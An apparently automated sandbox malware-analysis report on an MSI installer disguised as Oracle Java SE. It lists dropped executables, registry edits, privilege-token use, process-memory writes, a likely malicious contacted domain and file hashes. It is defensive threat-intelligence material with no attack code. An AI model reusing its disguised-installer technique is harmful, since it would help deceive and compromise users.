Malware Analysis Report

2024-12-07 14:30

Sample ID 241016-j8981a1dmg
Target 4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118
SHA256 f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9
Tags
discovery persistence privilege_escalation defense_evasion execution exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

f8cf786235acc09140f9f2b21f61d2f2886f2592afb814b29bffd5550be849e9

Threat Level: Likely malicious

The file 4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

discovery persistence privilege_escalation defense_evasion execution exploit

Command and Scripting Interpreter: PowerShell

Possible privilege escalation attempt

Modifies file permissions

Enumerates connected drives

Blocklisted process makes network request

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Executes dropped EXE

Drops file in Program Files directory

Drops file in Windows directory

Loads dropped DLL

System Location Discovery: System Language Discovery

Event Triggered Execution: Installer Packages

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Modifies registry class

Modifies data under HKEY_USERS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-16 08:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-16 08:21

Reported

2024-10-16 08:24

Platform

win7-20240729-en

Max time kernel

142s

Max time network

62s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\f77c948.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f77c948.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f77c949.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICD4D.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\f77c94b.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f77c949.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICC41.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICC51.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\Logo.ico C:\Windows\system32\msiexec.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\3D88EA3CC1A0467488E5B6F3617FDD84 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84\ProductFeature C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductIcon = "C:\\Windows\\Installer\\{C3AE88D3-0A1C-4764-885E-6B3F16F7DD48}\\Logo.ico" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\PackageName = "4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\PackageCode = "9CC889D6EA63DC94DA730B4082DA0DA1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\Version = "134217999" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D88EA3CC1A0467488E5B6F3617FDD84 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D88EA3CC1A0467488E5B6F3617FDD84\ProductName = "Oracle Java SE" C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\syswow64\MsiExec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 3068 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 808 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1852 wrote to memory of 1924 N/A C:\Windows\system32\msiexec.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 1852 wrote to memory of 1924 N/A C:\Windows\system32\msiexec.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 1852 wrote to memory of 1924 N/A C:\Windows\system32\msiexec.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 1852 wrote to memory of 1924 N/A C:\Windows\system32\msiexec.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\4c11285fc4be4ffa97a866fbc13bbd83_JaffaCakes118.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding F846D7892EC1A7F3C05386819156FEF4

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A7B7C43405B7DE54D4C7E4575FA51208 M Global\MSI0000

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe

"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 repository.certum.pl udp
GB 2.18.63.21:80 repository.certum.pl tcp
US 8.8.8.8:53 websekir.com udp
N/A 127.0.0.1:49425 tcp
N/A 127.0.0.1:49428 tcp
N/A 127.0.0.1:49431 tcp
N/A 127.0.0.1:49434 tcp
N/A 127.0.0.1:49437 tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabC812.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarC824.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8db417db00fe3cf55e2a3bfd7706c920
SHA1 fbfae63b218940b237ee915cc406bc98ad33bdab
SHA256 e815c0884eeda37b3ef35d1783284c70ed02673dba3956eb8a007caaae9e8f65
SHA512 86e7137c74e7522fb5a13b4f8473d8fbd57d90d3da6b54b0d0fc42d449f6f59887b8ad48b29779bbf3b3a5e89219bf874897aeac64a2718c539c38c6004f693c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6525274CBC2077D43D7D17A33C868C4F

MD5 d5e98140c51869fc462c8975620faa78
SHA1 07e032e020b72c3f192f0628a2593a19a70f069e
SHA256 5c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e
